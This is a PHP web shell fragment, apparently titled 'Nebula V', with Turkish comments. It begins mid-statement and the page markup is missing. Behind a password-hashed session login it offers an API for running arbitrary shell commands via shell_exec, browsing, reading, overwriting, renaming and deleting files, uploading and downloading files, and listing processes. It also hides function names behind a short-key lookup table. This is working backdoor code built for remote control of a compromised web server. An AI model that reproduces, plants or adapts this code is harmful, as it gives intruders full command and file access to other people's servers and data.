'destroyed'])); } if (isset($_GET['logout'])) { session_destroy(); header('Location: '.strtok($_SERVER['REQUEST_URI'], '?')); exit; } if (!isset($_SESSION['nebula_auth'])) { if (isset($_POST['k']) && hash('sha256', $_POST['k']) === $auth_hash) { $_SESSION['nebula_auth'] = true; $_SESSION['cwd'] = getcwd(); } else { // Login ekranı çıktısı için buffer temizle ob_end_clean(); die('
'); } } // 4. Core class Core { public function r($n, ...$a) { $m = ['e'=>'exec', 's'=>'scandir', 'f'=>'file_get_contents', 'w'=>'file_put_contents', 'r'=>'rename', 'u'=>'unlink', 'c'=>'chmod']; if($n=='x') return shell_exec($a[0]." 2>&1"); return ($m[$n])(...$a); } } $sys = new Core(); if(!isset($_SESSION['cwd']) || !is_dir($_SESSION['cwd'])) $_SESSION['cwd'] = getcwd(); @chdir($_SESSION['cwd']); // 5. API if (isset($_POST['req'])) { // JSON yanıtı öncesi buffer temizle (Kritik!) ob_clean(); $req = $_POST['req']; if($req !== 'download') header('Content-Type: application/json'); if ($req === 'cmd') { $cmd = $_POST['c']; $out = ''; if (preg_match('/^cd\s+(.*)$/', $cmd, $m)) { $target = trim($m[1]); if($target == '') $target = '/'; if (@chdir($target)) { $_SESSION['cwd'] = getcwd(); } else { $out = "cd: error: $target"; } } else { $out = $sys->r('x', $cmd); } echo json_encode(['out' => $out, 'cwd' => $_SESSION['cwd']]); exit; } if ($req === 'list') { $path = $_POST['path'] ?? $_SESSION['cwd']; if(empty($path)) $path = $_SESSION['cwd']; if(is_dir($path)) { @chdir($path); $_SESSION['cwd'] = $path; $items = @scandir($path); $res = []; if($items) { foreach($items as $i) { if($i == '.') continue; $p = $path . DIRECTORY_SEPARATOR . $i; $stat = @stat($p); $res[] = [ 'n' => $i, 'd' => is_dir($p), 's' => is_dir($p) ? '-' : round(($stat['size']??0)/1024, 2).' KB', 'p' => substr(sprintf('%o', fileperms($p)), -4), ]; } } echo json_encode(['files' => $res, 'cwd' => $path]); } else { echo json_encode(['error' => 'Path Error']); } exit; } if ($req === 'read') { $c = @file_get_contents($_POST['f']); echo json_encode(['data' => base64_encode($c)]); exit; } if ($req === 'save') { echo json_encode(['status' => @file_put_contents($_POST['f'], base64_decode($_POST['c']))]); exit; } if ($req === 'del') { echo json_encode(['status' => @unlink($_POST['f'])]); exit; } if ($req === 'rename') { echo json_encode(['status' => @rename($_POST['old'], $_POST['new'])]); exit; } if ($req === 'upload') { @move_uploaded_file($_FILES['file']['tmp_name'], $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $_FILES['file']['name']); exit; } if ($req === 'ps') { echo json_encode(['out' => @shell_exec('ps aux')]); exit; } if ($req === 'download') { $f = $_POST['f']; if(file_exists($f)){ header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($f).'"'); header('Content-Length: '.filesize($f)); readfile($f); } exit; } exit; } // Sayfa çıktısı öncesi bufferı temizle ama kapatma ob_clean(); ?> Nebula V
NameSizePermsActions